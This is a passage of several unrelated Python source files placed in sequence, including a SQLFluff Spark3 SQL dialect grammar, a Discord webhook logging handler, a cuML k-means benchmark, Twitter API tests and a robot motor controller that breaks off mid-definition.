"EndAngleBracketSegment", False), ] ) # Real Segments spark3_dialect.replace( ComparisonOperatorGrammar=OneOf( Ref("EqualsSegment"), Ref("EqualsSegment_a"), Ref("EqualsSegment_b"), Ref("GreaterThanSegment"), Ref("LessThanSegment"), Ref("GreaterThanOrEqualToSegment"), Ref("LessThanOrEqualToSegment"), Ref("NotEqualToSegment"), Ref("LikeOperatorSegment"), ), TemporaryGrammar=Sequence( Sequence("GLOBAL", optional=True), OneOf("TEMP", "TEMPORARY"), ), QuotedIdentifierSegment=NamedParser( "back_quote", CodeSegment, name="quoted_identifier", type="identifier", trim_chars=("`",), ), ) spark3_dialect.add( # Add Hive Segments TODO : Is there a way to retrieve this w/o redefining? DoubleQuotedLiteralSegment=NamedParser( "double_quote", CodeSegment, name="quoted_literal", type="literal", trim_chars=('"',), ), JsonfileKeywordSegment=StringParser( "JSONFILE", KeywordSegment, name="json_file", type="file_format", ), RcfileKeywordSegment=StringParser( "RCFILE", KeywordSegment, name="rc_file", type="file_format" ), SequencefileKeywordSegment=StringParser( "SEQUENCEFILE", KeywordSegment, name="sequence_file", type="file_format" ), TextfileKeywordSegment=StringParser( "TEXTFILE", KeywordSegment, name="text_file", type="file_format" ), StartAngleBracketSegment=StringParser( "<", SymbolSegment, name="start_angle_bracket", type="start_angle_bracket" ), EndAngleBracketSegment=StringParser( ">", SymbolSegment, name="end_angle_bracket", type="end_angle_bracket" ), # Add Spark Segments EqualsSegment_a=StringParser( "==", SymbolSegment, name="equals", type="comparison_operator" ), EqualsSegment_b=StringParser( "<=>", SymbolSegment, name="equals", type="comparison_operator" ), FileKeywordSegment=StringParser( "FILE", KeywordSegment, name="file", type="file_type" ), JarKeywordSegment=StringParser("JAR", KeywordSegment, name="jar", type="file_type"), WhlKeywordSegment=StringParser("WHL", KeywordSegment, name="whl", type="file_type"), # Add relevant Hive Grammar BracketedPropertyListGrammar=hive_dialect.get_grammar( "BracketedPropertyListGrammar" ), CommentGrammar=hive_dialect.get_grammar("CommentGrammar"), FileFormatGrammar=hive_dialect.get_grammar("FileFormatGrammar"), LocationGrammar=hive_dialect.get_grammar("LocationGrammar"), PropertyGrammar=hive_dialect.get_grammar("PropertyGrammar"), SerdePropertiesGrammar=hive_dialect.get_grammar("SerdePropertiesGrammar"), StoredAsGrammar=hive_dialect.get_grammar("StoredAsGrammar"), StoredByGrammar=hive_dialect.get_grammar("StoredByGrammar"), StorageFormatGrammar=hive_dialect.get_grammar("StorageFormatGrammar"), SingleOrDoubleQuotedLiteralGrammar=hive_dialect.get_grammar( "SingleOrDoubleQuotedLiteralGrammar" ), TerminatedByGrammar=hive_dialect.get_grammar("TerminatedByGrammar"), # Add Spark Grammar BucketSpecGrammar=Sequence( Ref("ClusterSpecGrammar"), Ref("SortSpecGrammar", optional=True), "INTO", Ref("NumericLiteralSegment"), "BUCKETS", ), ClusterSpecGrammar=Sequence( "CLUSTERED", "BY", Ref("BracketedColumnReferenceListGrammar"), ), DatabasePropertiesGrammar=Sequence( "DBPROPERTIES", Ref("BracketedPropertyListGrammar") ), DataSourceFormatGrammar=OneOf( # Spark Core Data Sources # https://spark.apache.org/docs/latest/sql-data-sources.html "AVRO", "CSV", "JSON", "PARQUET", "ORC", "JDBC", # Community Contributed Data Sources "DELTA", # https://github.com/delta-io/delta "XML", # https://github.com/databricks/spark-xml ), PartitionSpecGrammar=Sequence( OneOf("PARTITION", Sequence("PARTITIONED", "BY")), Bracketed( Delimited( Sequence( Ref("ColumnReferenceSegment"), Ref("EqualsSegment", optional=True), Ref("LiteralGrammar", optional=True), Ref("CommentGrammar", optional=True), ), ), ), ), ResourceFileGrammar=OneOf( Ref("JarKeywordSegment"), Ref("WhlKeywordSegment"), Ref("FileKeywordSegment"), ), ResourceLocationGrammar=Sequence( "USING", Ref("ResourceFileGrammar"), Ref("SingleOrDoubleQuotedLiteralGrammar"), ), SortSpecGrammar=Sequence( "SORTED", "BY", Bracketed( Delimited( Sequence( Ref("ColumnReferenceSegment"), OneOf("ASC", "DESC", optional=True), ) ) ), optional=True, ), UnsetTablePropertiesGrammar=Sequence( "UNSET", "TBLPROPERTIES", Ref("IfExistsGrammar", optional=True), Bracketed(Delimited(Ref("SingleOrDoubleQuotedLiteralGrammar"))), ), TablePropertiesGrammar=Sequence( "TBLPROPERTIES", Ref("BracketedPropertyListGrammar") ), ) # Hive Segments @spark3_dialect.segment() class RowFormatClauseSegment(hive_dialect.get_segment("RowFormatClauseSegment")): # type: ignore """`ROW FORMAT` clause in a CREATE HIVEFORMAT TABLE statement.""" type = "row_format_clause" @spark3_dialect.segment() class SkewedByClauseSegment(hive_dialect.get_segment("SkewedByClauseSegment")): # type: ignore """`SKEWED BY` clause in a CREATE HIVEFORMAT TABLE statement.""" type = "skewed_by_clause" # Primitive Data Types @spark3_dialect.segment() class PrimitiveTypeSegment(BaseSegment): """Spark SQL Primitive data types. https://spark.apache.org/docs/latest/sql-ref-datatypes.html """ type = "primitive_type" match_grammar = OneOf( "BOOLEAN", # TODO : not currently supported; add segment - see NumericLiteralSegment # "BYTE", "TINYINT", # TODO : not currently supported; add segment - see NumericLiteralSegment # "SHORT", "SMALLINT", "INT", "BIGINT", "FLOAT", "REAL", "DOUBLE", "DATE", "TIMESTAMP", "STRING", Sequence( OneOf("CHAR", "CHARACTER", "VARCHAR"), Bracketed(Ref("NumericLiteralSegment"), optional=True), ), "BINARY", Sequence( OneOf("DECIMAL", "DEC", "NUMERIC"), Bracketed( Ref("NumericLiteralSegment"), Ref("CommaSegment"), Ref("NumericLiteralSegment"), optional=True, ), ), "INTERVAL", ) @spark3_dialect.segment(replace=True) class DatatypeSegment(PrimitiveTypeSegment): """Spark SQL Data types. https://spark.apache.org/docs/latest/sql-ref-datatypes.html """ type = "data_type" match_grammar = OneOf( Ref("PrimitiveTypeSegment"), Sequence( "ARRAY", Bracketed( Ref("DatatypeSegment"), bracket_pairs_set="angle_bracket_pairs", bracket_type="angle", ), ), Sequence( "MAP", Bracketed( Sequence( Ref("PrimitiveTypeSegment"), Ref("CommaSegment"), Ref("DatatypeSegment"), ), bracket_pairs_set="angle_bracket_pairs", bracket_type="angle", ), ), Sequence( "STRUCT", Bracketed( Delimited( Sequence( Ref("NakedIdentifierSegment"), Ref("ColonSegment"), Ref("DatatypeSegment"), Ref("CommentGrammar", optional=True), ), ), bracket_pairs_set="angle_bracket_pairs", bracket_type="angle", ), ), ) # Data Definition Statements # http://spark.apache.org/docs/latest/sql-ref-syntax-ddl.html @spark3_dialect.segment() class AlterDatabaseStatementSegment(BaseSegment): """An `ALTER DATABASE/SCHEMA` statement. http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-database.html """ type = "alter_database_statement" match_grammar = Sequence( "ALTER", OneOf("DATABASE", "SCHEMA"), Ref("DatabaseReferenceSegment"), "SET", Ref("DatabasePropertiesGrammar"), ) @spark3_dialect.segment(replace=True) class AlterTableStatementSegment(BaseSegment): """A `ALTER TABLE` statement to change the table schema or properties. http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-table.html """ type = "alter_table_statement" match_grammar = Sequence( "ALTER", "TABLE", Ref("TableReferenceSegment"), OneOf( # ALTER TABLE - RENAME TO `table_identifier` Sequence( "RENAME", "TO", Ref("TableReferenceSegment"), ), # ALTER TABLE - RENAME `partition_spec` Sequence( Ref("PartitionSpecGrammar"), "RENAME", "TO", Ref("PartitionSpecGrammar"), ), # ALTER TABLE - ADD COLUMNS Sequence( "ADD", "COLUMNS", Bracketed( Delimited( Ref("ColumnDefinitionSegment"), ), ), ), # ALTER TABLE - ALTER OR CHANGE COLUMN Sequence( OneOf("ALTER", "CHANGE"), "COLUMN", Ref("ColumnReferenceSegment"), Sequence("TYPE", Ref("DatatypeSegment"), optional=True), Ref("CommentGrammar", optional=True), OneOf( "FIRST", Sequence("AFTER", Ref("ColumnReferenceSegment")), optional=True, ), Sequence(OneOf("SET", "DROP"), "NOT NULL", optional=True), ), # ALTER TABLE - ADD PARTITION Sequence( "ADD", Ref("IfNotExistsGrammar", optional=True), AnyNumberOf(Ref("PartitionSpecGrammar")), ), # ALTER TABLE - DROP PARTITION Sequence( "DROP", Ref("IfExistsGrammar", optional=True), Ref("PartitionSpecGrammar"), Sequence("PURGE", optional=True), ), # ALTER TABLE - REPAIR PARTITION Sequence("RECOVER", "PARTITIONS"), # ALTER TABLE - SET PROPERTIES Sequence("SET", Ref("TablePropertiesGrammar")), # ALTER TABLE - UNSET PROPERTIES Ref("UnsetTablePropertiesGrammar"), # ALTER TABLE - SET SERDE Sequence( Ref("PartitionSpecGrammar", optional=True), "SET", OneOf( Sequence( "SERDEPROPERTIES", Ref("BracketedPropertyListGrammar"), ), Sequence( "SERDE", Ref("SingleOrDoubleQuotedLiteralGrammar"), Ref("SerdePropertiesGrammar", optional=True), ), ), ), # ALTER TABLE - SET FILE FORMAT Sequence( Ref("PartitionSpecGrammar", optional=True), "SET", "FILEFORMAT", Ref("DataSourceFormatGrammar"), ), # ALTER TABLE - CHANGE FILE LOCATION Sequence( Ref("PartitionSpecGrammar"), "SET", Ref("LocationGrammar"), ), ), ) @spark3_dialect.segment() class AlterViewStatementSegment(BaseSegment): """A `ALTER VIEW` statement to change the view schema or properties. https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-view.html """ type = "alter_view_statement" match_grammar = Sequence( "ALTER", "VIEW", Ref("TableReferenceSegment"), OneOf( Sequence( "RENAME", "TO", Ref("TableReferenceSegment"), ), Sequence("SET", Ref("TablePropertiesGrammar")), Ref("UnsetTablePropertiesGrammar"), Sequence( "AS", OptionallyBracketed(Ref("SelectStatementSegment")), ), ), ) @spark3_dialect.segment(replace=True) class CreateDatabaseStatementSegment(BaseSegment): """A `CREATE DATABASE` statement. https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-database.html """ type = "create_database_statement" match_grammar = Sequence( "CREATE", OneOf("DATABASE", "SCHEMA"), Ref("IfNotExistsGrammar", optional=True), Ref("DatabaseReferenceSegment"), Ref("CommentGrammar", optional=True), Ref("LocationGrammar", optional=True), Sequence( "WITH", "DBPROPERTIES", Ref("BracketedPropertyListGrammar"), optional=True ), ) @spark3_dialect.segment(replace=True) class CreateFunctionStatementSegment(BaseSegment): """A `CREATE FUNCTION` statement. https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-function.html """ type = "create_function_statement" match_grammar = Sequence( "CREATE", Sequence("OR", "REPLACE", optional=True), Ref("TemporaryGrammar", optional=True), "FUNCTION", Anything(), ) parse_grammar = Sequence( "CREATE", Sequence("OR", "REPLACE", optional=True), Ref("TemporaryGrammar", optional=True), "FUNCTION", Ref("IfNotExistsGrammar", optional=True), Ref("FunctionNameIdentifierSegment"), "AS", Ref("SingleOrDoubleQuotedLiteralGrammar"), Ref("ResourceLocationGrammar", optional=True), ) @spark3_dialect.segment(replace=True) class CreateTableStatementSegment(BaseSegment): """A `CREATE TABLE` statement using a Data Source or Like. http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-datasource.html https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-like.html """ type = "create_table_statement" match_grammar = Sequence( "CREATE", "TABLE", Ref("IfNotExistsGrammar", optional=True), Ref("TableReferenceSegment"), OneOf( # Columns and comment syntax: Sequence( Bracketed( Delimited( Sequence( Ref("ColumnDefinitionSegment"), Ref("CommentGrammar", optional=True), ), ), ), ), # Like Syntax Sequence( "LIKE", Ref("TableReferenceSegment"), ), optional=True, ), Sequence("USING", Ref("DataSourceFormatGrammar"), optional=True), Ref("RowFormatClauseSegment", optional=True), Ref("StoredAsGrammar", optional=True), Sequence("OPTIONS", Ref("BracketedPropertyListGrammar"), optional=True), Ref("PartitionSpecGrammar", optional=True), Ref("BucketSpecGrammar", optional=True), AnyNumberOf( Ref("LocationGrammar", optional=True), Ref("CommentGrammar", optional=True), Ref("TablePropertiesGrammar", optional=True), ), # Create AS syntax: Sequence( "AS", OptionallyBracketed(Ref("SelectableGrammar")), optional=True, ), ) @spark3_dialect.segment() class CreateHiveFormatTableStatementSegment(hive_dialect.get_segment("CreateTableStatementSegment")): # type: ignore """A `CREATE TABLE` statement using Hive format. https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-hiveformat.html """ type = "create_table_statement" @spark3_dialect.segment(replace=True) class CreateViewStatementSegment(BaseSegment): """A `CREATE VIEW` statement. https://spark.apache.org/docs/3.0.0/sql-ref-syntax-ddl-create-view.html#syntax """ type = "create_view_statement" match_grammar = Sequence( "CREATE", Ref("OrReplaceGrammar", optional=True), Ref("TemporaryGrammar", optional=True), "VIEW", Ref("IfNotExistsGrammar", optional=True), Ref("TableReferenceSegment"), # Columns and comment syntax: Sequence( Bracketed( Delimited( Sequence( Ref("ColumnReferenceSegment"), Ref("CommentGrammar", optional=True), ), ), ), optional=True, ), Ref("CommentGrammar", optional=True), Ref("TablePropertiesGrammar", optional=True), "AS", Ref("SelectableGrammar"), Ref("WithNoSchemaBindingClauseSegment", optional=True), ) @spark3_dialect.segment() class DropFunctionStatementSegment(BaseSegment): """A `DROP FUNCTION` STATEMENT. https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-drop-function.html """ type = "drop_function_statement" match_grammar = Sequence( "DROP", Ref("TemporaryGrammar", optional=True), "FUNCTION", Ref("IfExistsGrammar", optional=True), Ref("FunctionNameSegment"), ) @spark3_dialect.segment() class MsckRepairTableStatementSegment(hive_dialect.get_segment("MsckRepairTableStatementSegment")): # type: ignore """A `REPAIR TABLE` statement using Hive MSCK (Metastore Check) format. This class inherits from Hive since Spark leverages Hive format for this command and is dependent on the Hive metastore. https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-repair-table.html """ type = "msck_repair_table_statement" # Auxiliary Statements @spark3_dialect.segment() class AddExecutablePackage(BaseSegment): """A `ADD JAR` statement. https://spark.apache.org/docs/latest/sql-ref-syntax-aux-resource-mgmt-add-jar.html """ type = "add_executable_package" match_grammar = Sequence( "ADD", Ref("ResourceFileGrammar"), Ref("SingleOrDoubleQuotedLiteralGrammar"), ) @spark3_dialect.segment(replace=True) class StatementSegment(BaseSegment): """Overriding StatementSegment to allow for additional segment parsing.""" match_grammar = ansi_dialect.get_segment("StatementSegment").match_grammar.copy() parse_grammar = ansi_dialect.get_segment("StatementSegment").parse_grammar.copy( # Segments defined in Spark3 dialect insert=[ # Data Definition Statements Ref("AlterDatabaseStatementSegment"), Ref("AlterTableStatementSegment"), Ref("AlterViewStatementSegment"), Ref("CreateHiveFormatTableStatementSegment"), Ref("DropFunctionStatementSegment"), Ref("MsckRepairTableStatementSegment"), # Auxiliary Statements Ref("AddExecutablePackage"), ], remove=[ Ref("TransactionStatementSegment"), Ref("CreateSchemaStatementSegment"), Ref("SetSchemaStatementSegment"), Ref("CreateExtensionStatementSegment"), Ref("CreateModelStatementSegment"), Ref("DropModelStatementSegment"), ], ) @spark3_dialect.segment(replace=True) class JoinClauseSegment(BaseSegment): """Any number of join clauses, including the `JOIN` keyword. https://spark.apache.org/docs/3.0.0/sql-ref-syntax-qry-select-join.html TODO: Add NATURAL JOIN syntax. """ type = "join_clause" match_grammar = Sequence( # NB These qualifiers are optional # TODO: Allow nested joins like: # ....FROM S1.T1 t1 LEFT JOIN ( S2.T2 t2 JOIN S3.T3 t3 ON t2.col1=t3.col1) ON tab1.col1 = tab2.col1 OneOf( "CROSS", "INNER", Sequence( OneOf( "FULL", "LEFT", "RIGHT", ), Ref.keyword("OUTER", optional=True), ), Sequence( Ref.keyword("LEFT", optional=True), "SEMI", ), Sequence( Ref.keyword("LEFT", optional=True), "ANTI", ), optional=True, ), Ref("JoinKeywords"), Indent, Sequence( Ref("FromExpressionElementSegment"), Conditional(Dedent, indented_using_on=False), # NB: this is optional OneOf( # ON clause Ref("JoinOnConditionSegment"), # USING clause Sequence( "USING", Indent, Bracketed( # NB: We don't use BracketedColumnReferenceListGrammar # here because we're just using SingleIdentifierGrammar, # rather than ObjectReferenceSegment or ColumnReferenceSegment. # This is a) so that we don't lint it as a reference and # b) because the column will probably be returned anyway # during parsing. Delimited( Ref("SingleIdentifierGrammar"), ephemeral_name="UsingClauseContents", ) ), Dedent, ), # Unqualified joins *are* allowed. They just might not # be a good idea. optional=True, ), Conditional(Indent, indented_using_on=False), ), Dedent, ) get_eventual_alias = ansi_dialect.get_segment( "JoinClauseSegment" ).get_eventual_alias
"""A logging handler that emits to a Discord webhook.""" import requests from logging import Handler class DiscordHandler(Handler): """A logging handler that emits to a Discord webhook.""" def __init__(self, webhook, *args, **kwargs): """Initialize the DiscordHandler class.""" super().__init__(*args, **kwargs) self.webhook = webhook def emit(self, record): """Emit record to the Discord webhook.""" json = {"content": self.format(record)} try: requests.post(self.webhook, json=json) except requests.RequestException: self.handleError(record)
""" WSGI config for pithyquotes project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pithyquotes.settings') application = get_wsgi_application()
""" Class to initialize common objects. """ import pickle from pathlib import Path ################################################################ class Init(): #--------------------------------------------------------------- # Constructor #--------------------------------------------------------------- def __init__(self, workdir, **kwargs): print('Init class created.') self.workdir = Path(workdir) self.cachedir = self.workdir / 'cache' print('workdir: {}'.format(self.workdir)) print('cachedir: {}'.format(self.cachedir)) #--------------------------------------------------------------- # Initialize settings as class members of obj #--------------------------------------------------------------- def Initialize(self, obj): obj.workdir = self.workdir obj.cachedir = self.cachedir obj.cachedir.mkdir(parents=True, exist_ok=True) obj.AllData = pickle.load((obj.workdir / 'default.p').open('rb')) #: Sets the collision systems for the entire project, #: where each system is a string of the form #: ``'<projectile 1><projectile 2><beam energy in GeV>'``, #: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``. #: Even if the project uses only a single system, #: this should still be a list of one system string. obj.systems = obj.AllData["systems"] #: Design attribute. This is a list of #: strings describing the inputs. #: The default is for the example data. obj.keys = obj.AllData["keys"] #: Design attribute. This is a list of input #: labels in LaTeX for plotting. #: The default is for the example data. obj.labels = obj.AllData["labels"] #: Design attribute. This is list of tuples of #: (min,max) for each design input. #: The default is for the example data. obj.ranges = obj.AllData["ranges"] #: Design array to use - should be a numpy array. #: Keep at None generate a Latin Hypercube with above (specified) range. #: Design array for example is commented under default. obj.design_array = obj.AllData["design"] #: Dictionary of the model output. #: Form MUST be data_list[system][observable][subobservable][{'Y': ,'x': }]. #: 'Y' is an (n x p) numpy array of the output. #: #: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T. #: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example. obj.data_list = obj.AllData["model"] #: Dictionary for the model validation output #: Must be the same for as the model output dictionary #data_list_val = pickle.load((cachedir / 'model/validation/data_dict_val.p').open('rb')) obj.data_list_val = None #: Dictionary of the experimental data. #: Form MUST be exp_data_list[system][observable][subobservable][{'y':,'x':,'yerr':{'stat':,'sys'}}]. #: 'y' is a (1 x p) numpy array of experimental data. #: #: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T. #: #: 'yerr' is a dictionary with keys 'stat' and 'sys'. #: #: 'stat' is a (1 x p) array of statistical errors. #: #: 'sys' is a (1 x p) array of systematic errors. #: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example. obj.exp_data_list = obj.AllData["data"] #: Experimental covariance matrix. #: Set exp_cov = None to have the script estimate the covariance matrix. #: Example commented below default. obj.exp_cov = obj.AllData["cov"] #: Observables to emulate as a list of 2-tuples #: ``(obs, [list of subobs])``. obj.observables = obj.AllData["observables"] #--------------------------------------------------------------- # Initialize settings as class members of obj #--------------------------------------------------------------- def systems(self): AllData = pickle.load((self.workdir / 'default.p').open('rb')) #: Sets the collision systems for the entire project, #: where each system is a string of the form #: ``'<projectile 1><projectile 2><beam energy in GeV>'``, #: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``. #: Even if the project uses only a single system, #: this should still be a list of one system string. return AllData["systems"] #--------------------------------------------------------------- # Return formatted string of class members #--------------------------------------------------------------- def __str__(self): s = [] variables = self.__dict__.keys() for v in variables: s.append('{} = {}'.format(v, self.__dict__[v])) return "[i] {} with \n . {}".format(self.__class__.__name__, '\n . '.join(s))
#=============================================================================== # Copyright 2020 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #=============================================================================== import sys import os import argparse sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) import bench import numpy as np from cuml import KMeans import warnings from sklearn.metrics.cluster import davies_bouldin_score warnings.filterwarnings('ignore', category=FutureWarning) parser = argparse.ArgumentParser(description='cuML K-means benchmark') parser.add_argument('-i', '--filei', '--fileI', '--init', type=str, help='Initial clusters') parser.add_argument('-t', '--tol', type=float, default=0., help='Absolute threshold') parser.add_argument('--maxiter', type=int, default=100, help='Maximum number of iterations') parser.add_argument('--samples-per-batch', type=int, default=32768, help='Maximum number of iterations') parser.add_argument('--n-clusters', type=int, help='Number of clusters') params = bench.parse_args(parser, prefix='cuml', loop_types=('fit', 'predict')) # Load and convert generated data X_train, X_test, _, _ = bench.load_data(params) if params.filei == 'k-means++': X_init = 'k-means++' # Load initial centroids from specified path elif params.filei is not None: X_init = np.load(params.filei).astype(params.dtype) params.n_clusters = X_init.shape[0] # or choose random centroids from training data else: np.random.seed(params.seed) centroids_idx = np.random.randint(0, X_train.shape[0], size=params.n_clusters) if hasattr(X_train, "iloc"): X_init = X_train.iloc[centroids_idx].to_pandas().values else: X_init = X_train[centroids_idx] # Workaround for cuML kmeans fail # when second call of 'fit' method causes AttributeError def kmeans_fit(X): alg = KMeans(n_clusters=params.n_clusters, tol=params.tol, max_iter=params.maxiter, init=X_init, max_samples_per_batch=params.samples_per_batch) alg.fit(X) return alg # Time fit fit_time, kmeans = bench.measure_function_time(kmeans_fit, X_train, params=params) train_predict = kmeans.predict(X_train) # Time predict predict_time, test_predict = bench.measure_function_time(kmeans.predict, X_test, params=params) X_train_host = bench.convert_to_numpy(X_train) train_predict_host = bench.convert_to_numpy(train_predict) acc_train = davies_bouldin_score(X_train_host, train_predict_host) X_test_host = bench.convert_to_numpy(X_test) test_predict_host = bench.convert_to_numpy(test_predict) acc_test = davies_bouldin_score(X_test_host, test_predict_host) bench.print_output(library='cuml', algorithm='kmeans', stages=['training', 'prediction'], params=params, functions=['KMeans.fit', 'KMeans.predict'], times=[fit_time, predict_time], accuracy_type='davies_bouldin_score', accuracies=[acc_train, acc_test], data=[X_train, X_test], alg_instance=kmeans)
from .telescope import Telescope
from mcstats import mcstats mcstats.registry.append( mcstats.MinecraftStat( 'pot_flower', { 'title': 'Florist', 'desc': 'Flowers potted', 'unit': 'int', }, mcstats.StatReader(['minecraft:custom','minecraft:pot_flower']) ))
import unittest from social_apis.networks.twitter_v2 import Twitter2 from config import tw_access_token class TestTwitter2(unittest.TestCase): def setUp(self): self.tweet_ids = ['1261326399320715264', '1278347468690915330'] self.api = Twitter2(access_token=tw_access_token) def test_get_tweet(self): self.api.get_tweet(id=self.tweet_ids[0]) def test_get_tweets(self): self.api.get_tweets(ids=self.tweet_ids) def test_get_compliance_jobs(self): self.api.get_compliance_jobs(type='tweets') def test_quota_parsing(self): self.api.get_compliance_jobs(type='tweets') self.assertIsNotNone(self.api.get_quota())
#! /usr/bin/env python # Copyright (c) 2014, Dawn Robotics Ltd # All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # 3. Neither the name of the Dawn Robotics Ltd nor the names of its contributors # may be used to endorse or promote products derived from this software without # specific prior written permission. # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import logging import math import time import Queue import mini_driver import threading #--------------------------------------------------------------------------------------------------- class RobotController: MIN_ANGLE = 0.0 MAX_ANGLE = 180.0 CENTRE_ANGLE = (MIN_ANGLE + MAX_ANGLE)/2.0 MAX_UPDATE_TIME_DIFF = 0.25 TIME_BETWEEN_SERVO_SETTING_UPDATES = 1.0 TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES = 0.5 JOYSTICK_DEAD_ZONE = 0.1 MAX_ABS_NECK_SPEED = 30.0 # Degrees per second MOTION_COMMAND_TIMEOUT = 2.0 # If no commands for the motors are recieved in this time then # the motors (drive and servo) are set to zero speed #----------------------------------------------------------------------------------------------- def __init__( self, robotConfig ): self.miniDriver = mini_driver.MiniDriver() connected = self.miniDriver.connect() if not connected: raise Exception( "Unable to connect to the mini driver" ) self.robotConfig = robotConfig self.leftMotorSpeed = 0 self.rightMotorSpeed = 0 self.panAngle = self.CENTRE_ANGLE self.tiltAngle = self.CENTRE_ANGLE self.panSpeed = 0.0 self.tiltSpeed = 0.0 self.lastServoSettingsSendTime = 0.0 self.lastSensorConfigurationSendTime = 0.0 self.lastUpdateTime = 0.0 self.lastMotionCommandTime = time.time() self.piSensorModuleName = "" self.piSensorModule = None self.piSensorReader = None self.piSensorDict = {} #----------------------------------------------------------------------------------------------- def __del__( self ): self.disconnect() #----------------------------------------------------------------------------------------------- def disconnect( self ): self.miniDriver.disconnect() #----------------------------------------------------------------------------------------------- def getStatusDict( self ): presetMaxAbsMotorSpeed, presetMaxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds() statusDict = { "batteryVoltage" : self.miniDriver.getBatteryVoltageReading().data, "presetMaxAbsMotorSpeed" : presetMaxAbsMotorSpeed, "presetMaxAbsTurnSpeed" : presetMaxAbsTurnSpeed, "sensors" : self.getSensorDict() } return statusDict #----------------------------------------------------------------------------------------------- def getSensorDict( self ): sensorDict = { "batteryVoltage" : self.miniDriver.getBatteryVoltageReading(), "digital" : self.miniDriver.getDigitalReadings(), "analog" : self.miniDriver.getAnalogReadings(), "ultrasonic" : self.miniDriver.getUltrasonicReading(), "encoders" : self.miniDriver.getEncodersReading(), } sensorDict.update( self.piSensorDict ) return sensorDict #----------------------------------------------------------------------------------------------- def normaliseJoystickData( self, joystickX, joystickY ): stickVectorLength = math.sqrt( joystickX**2 + joystickY**2 ) if stickVectorLength > 1.0: joystickX /= stickVectorLength joystickY /= stickVectorLength if stickVectorLength < self.JOYSTICK_DEAD_ZONE: joystickX = 0.0 joystickY = 0.0 return ( joystickX, joystickY ) #----------------------------------------------------------------------------------------------- def centreNeck( self ): self.panAngle = self.CENTRE_ANGLE self.tiltAngle = self.CENTRE_ANGLE self.panSpeed = 0.0 self.tiltSpeed = 0.0 #----------------------------------------------------------------------------------------------- def setMotorJoystickPos( self, joystickX, joystickY ): joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY ) if self.robotConfig.usePresetMotorSpeeds: maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds() else: maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed # Set forward speed from joystickY leftMotorSpeed = maxAbsMotorSpeed*joystickY rightMotorSpeed = maxAbsMotorSpeed*joystickY # Set turn speed from joystickX leftMotorSpeed += maxAbsTurnSpeed*joystickX rightMotorSpeed -= maxAbsTurnSpeed*joystickX leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) ) rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) ) self.leftMotorSpeed = leftMotorSpeed*self.robotConfig.leftMotorScale self.rightMotorSpeed = rightMotorSpeed self.lastMotionCommandTime = time.time() #----------------------------------------------------------------------------------------------- def setMotorSpeeds( self, leftMotorSpeed, rightMotorSpeed ): if self.robotConfig.usePresetMotorSpeeds: maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds() else: maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed self.leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) ) self.rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) ) self.lastMotionCommandTime = time.time() #----------------------------------------------------------------------------------------------- def 